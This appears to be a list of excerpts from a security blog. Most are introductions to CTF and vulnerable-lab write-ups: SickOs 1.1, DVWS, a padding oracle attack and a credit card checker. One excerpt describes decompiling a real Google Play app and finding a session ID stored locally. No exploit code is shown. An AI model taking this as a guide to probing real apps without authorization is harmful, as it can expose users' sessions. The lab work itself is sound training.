SickOs: 1.1 is a vulnerable machine with an objective to get root and read file /root/a0216ea4d51874464078c618298b1367.txt
Continuing analysis of application from previous post I found that sessionId is held in local file.
I chose one application in Google Play to test. Its main functionalities were focused on consuming a RESTful web service. I decompiled this application using tools dex2jar and JD-GUI. Firstly, I connected my phone to computer to get apk file
DVWS is similar to Damn Vulnerable Web Application, but communication between client and server is based on WebSockets. Source code is available here , but it’s much easier to use prepared Docker image.
In this exercise we have credit card checking web application to exploit. It takes cred card number and returns information whether our card is compromised or not.
According to VM’s description, we have to get root and read /root/Proof.txt file.
Our goal is to gain access to admin account by padding oracle attack. Application allows us to register accounts then encrypted cookie is used to authenticate.